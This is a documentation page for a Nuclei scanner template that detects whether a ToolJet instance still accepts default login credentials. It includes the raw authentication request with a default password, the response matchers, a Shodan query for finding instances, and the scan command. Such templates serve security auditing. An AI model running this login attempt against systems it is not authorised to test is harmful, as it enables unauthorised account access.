ToolJet - Default Login
ID: tooljet-default-login
Severity: high
Author: random-robbie
Tags: default-login,tooljet
Description
Section titled “Description”ToolJet contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
YAML Source
Section titled “YAML Source”id: tooljet-default-login
info: name: ToolJet - Default Login author: random-robbie severity: high description: | ToolJet contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: - https://docs.tooljet.com/docs/contributing-guide/setup/docker/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 cpe: cpe:2.3:a:tooljet:tooljet:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"tooljet" product: tooljet vendor: tooljet tags: default-login,tooljet
http: - raw: - | POST /api/authenticate HTTP/2 Host: {{Hostname}} Content-Type: application/json
{"email":"{{username}}","password":"{{password}}"}
attack: pitchfork payloads: username: password: - password
matchers-condition: and matchers: - type: word part: body words: - '"auth_token":' - '"organization_id":' condition: and
- type: word part: header words: - "application/json"
- type: status status: - 201# digest: 490a0046304402205027398cdda35a547d18eac3572f13148c7cafeb1551546ccde56d3799dca651022014b65f9f54be8ab832b6911bc16940b54dd2831120847ab60bfdcf388c346488:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/default-logins/tooljet/tooljet-default-login.yaml"